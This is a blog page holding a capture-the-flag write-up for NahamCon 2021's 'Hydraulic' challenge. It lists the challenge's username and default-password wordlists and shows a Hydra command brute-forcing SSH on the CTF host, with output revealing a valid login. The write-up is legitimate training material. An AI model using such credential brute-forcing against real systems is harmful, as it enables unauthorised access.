<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset='utf-8'>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="/assets/css/style.css?v=e627aba1d51976387add791c69284b005141ce22">
    <link rel="shortcut icon" type="image/png" href="http://0.0.0.0:4000/assets/images/shinris3n.png">

<!-- Begin Jekyll SEO tag v2.6.1 -->
<title>Hydraulic | 当て身 Atemi</title>
<meta name="generator" content="Jekyll v3.9.0" />
<meta property="og:title" content="Hydraulic" />
<meta name="author" content="shinris3n" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Challenge Text" />
<meta property="og:description" content="Challenge Text" />
<link rel="canonical" href="http://0.0.0.0:4000/writeups/2021/03/14/NahamCon2021-Hydraulic.html" />
<meta property="og:url" content="http://0.0.0.0:4000/writeups/2021/03/14/NahamCon2021-Hydraulic.html" />
<meta property="og:site_name" content="当て身 Atemi" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2021-03-14T23:42:00-05:00" />
<script type="application/ld+json">
{"author":{"@type":"Person","name":"shinris3n"},"url":"http://0.0.0.0:4000/writeups/2021/03/14/NahamCon2021-Hydraulic.html","@type":"BlogPosting","description":"Challenge Text","mainEntityOfPage":{"@type":"WebPage","@id":"http://0.0.0.0:4000/writeups/2021/03/14/NahamCon2021-Hydraulic.html"},"headline":"Hydraulic","dateModified":"2021-03-14T23:42:00-05:00","datePublished":"2021-03-14T23:42:00-05:00","@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->

  </head>

  <body>

    <header>
      <div class="container">
        <h1><a href = '/' style = "text-decoration:none;color:#b5e853;" >当て身 Atemi</a></h1>
        <h2>A Cybersecurity blog by shinris3n <br> 👊 <a href = "/writeups">Writeups</a> 👊 <a href = "/news">News</a> 👊 <a href = "/resources">Resources</a> <br></h2>
        <h5>Part of the <a href="https://www.ninpwn.com" target="_blank">Ninpwn</a> Network</h5>
      </div>
    </header>

    <div class="container">
      <a href="http://0.0.0.0:4000"><img src="http://0.0.0.0:4000/assets/images/shinris3n_banner_transparent.png" width="25%" height="25%" alt="shinris3n" title="shinris3n home page link"></a>
      <section id="main_content">
        <h5><a href="#" onclick="history.go(-1)"> &lt;&lt; back </a></h5><br>


<small>14 March 2021</small>
<h1>Hydraulic</h1>




 <small><font color="b5e853">Challenge Source: <em>NahamCon CTF 2021</em></font></small>

<br>

  <small><font color="b5e853">Challenge Category: <em>mission</em></font></small>


<h1></h1>
<h3><font color="FF3030">Challenge Text</font></h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Author: @JohnHammond#6971

This is Stage 2 of Path 5 in The Mission. After solving this challenge, you may need to refresh the page to see the newly unlocked challenges.

Gain access with the information you have gathered thus far and retrieve the flag.

You may bruteforce this challenge... hence the name ;)

Press the Start button on the top-right to begin this challenge.
</code></pre></div></div>

<h1></h1>
<h3><font color="FF3030">Solution</font></h3>

<ul>
  <li>Once finding new website directory structure via Lyra’s Twitter page and poking around a bit, we find http://constellations.page/constellations-documents/5/ with lists of user names and default passwords:</li>
</ul>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>CONSTELLATIONS Default Account Passwords
INTERNAL: this should not be shared outside of the org
Personnel Names

User accounts following the naming convention of lowercase firstname.

    orion
    pavo
    gus
    vela
    hercules
    leo
    lyra
    gemini 

Default Passwords

    starstar
    allstars
    starstruck
    starshine
    starsky
    popstars
    starship
    bluestars
    pinkstars
    superstars
    ilovestars
    rockstars
    thestars
    starscream
    gostars
    shootingstars
    northstars
    alpinestars
    starsign
    moonandstars
    starsrock
    luckystars
    iluvstars
    fivestars
    redstars
    mystars
    lovestars
    dallasstars
    moonstars
    sunmoonstars
    starsailor
    silverstars
    sevenstars
    lilstars
    dotaallstars
    sunstars
    starsun
    starsstars
    starsareblind
    pokerstars
    magicstars
    divastars
    blackstars
    starstarstar
    starsearch
    luvstars
    greenstars
    deathstars
    brightstars
    twinstars
    starsinthesky
    starshooter
    starsha
    threestars
    summerstars
    starspirit
    starshollow
    starsandstripes
    starsandmoons
    nightstars
    metrostars
    icstars
    hoodstars
    deadstars
    citystars
</code></pre></div></div>

<ul>
  <li>We can copy/paste these lists into separate files, then feed them into Hydra:</li>
</ul>

<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nv">$ </span>hydra <span class="nt">-s</span> 32369 <span class="nt">-L</span> <span class="nb">users</span> <span class="nt">-P</span> ./passwords challenge.nahamcon.com <span class="nt">-t</span> 4 ssh 
Hydra v9.1 <span class="o">(</span>c<span class="o">)</span> 2020 by van Hauser/THC &amp; David Maciejak - Please <span class="k">do </span>not use <span class="k">in </span>military or secret service organizations, or <span class="k">for </span>illegal purposes <span class="o">(</span>this is non-binding, these <span class="k">***</span> ignore laws and ethics anyway<span class="o">)</span><span class="nb">.</span>

Hydra <span class="o">(</span>https://github.com/vanhauser-thc/thc-hydra<span class="o">)</span> starting at 2021-03-13 11:13:25
<span class="o">[</span>DATA] max 4 tasks per 1 server, overall 4 tasks, 520 login tries <span class="o">(</span>l:8/p:65<span class="o">)</span>, ~130 tries per task
<span class="o">[</span>DATA] attacking ssh://challenge.nahamcon.com:32369/
<span class="o">[</span>STATUS] 36.00 tries/min, 36 tries <span class="k">in </span>00:01h, 484 to <span class="k">do in </span>00:14h, 4 active
<span class="o">[</span>STATUS] 29.67 tries/min, 89 tries <span class="k">in </span>00:03h, 431 to <span class="k">do in </span>00:15h, 4 active
<span class="o">[</span>32369][ssh] host: challenge.nahamcon.com   login: pavo   password: starsinthesky                                                                     
<span class="o">[</span>STATUS] 31.00 tries/min, 217 tries <span class="k">in </span>00:07h, 303 to <span class="k">do in </span>00:10h, 4 active
1 of 1 target successfully completed, 1 valid password found
Hydra <span class="o">(</span>https://github.com/vanhauser-thc/thc-hydra<span class="o">)</span> finished at 2021-03-13 11:21:48</code></pre></figure>

<ul>
  <li>After this, it’s just a matter of loading the instance, logging in with these credentials via SSH and grabbing the flag in the user’s home directory.</li>
</ul>



  <small>Tags: <em>NahamConCTF2021</em></small>


      </section>
    </div>

    
  </body>
</html>
